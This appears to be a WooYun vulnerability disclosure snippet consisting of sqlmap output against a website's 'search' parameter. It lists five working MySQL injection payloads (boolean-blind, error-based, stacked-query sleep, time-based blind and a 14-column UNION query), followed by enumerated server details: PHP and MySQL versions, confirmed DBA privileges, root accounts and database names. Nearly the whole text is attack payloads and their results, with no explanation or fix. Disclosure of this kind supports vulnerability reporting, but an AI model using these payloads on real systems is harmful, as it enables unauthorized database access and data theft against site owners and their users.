WooYun.org

Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=1') AND 7328=7328 AND ('kjGJ' LIKE 'kjGJ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search=1') AND (SELECT 6185 FROM(SELECT COUNT(*),CONCAT(0x71786a7871,(SELECT (ELT(6185=6185,1))),0x716a717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('VxBZ' LIKE 'VxBZ
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: search=1');(SELECT * FROM (SELECT(SLEEP(5)))XCWp)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: search=1') AND (SELECT * FROM (SELECT(SLEEP(5)))LYJP) AND ('idxx' LIKE 'idxx
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: search=1') UNION ALL SELECT CONCAT(0x71786a7871,0x63786249634563794c64,0x716a717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: PHP 5.4.37
back-end DBMS: MySQL 5.0
current user is DBA:    True
database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'OoH4X'
available databases [8]:
[*] faq_baidu
[*] faq_baidu_new
[*] information_schema
[*] jiaolian
[*] jiaolian1
[*] lehuo_test
[*] mysql
[*] test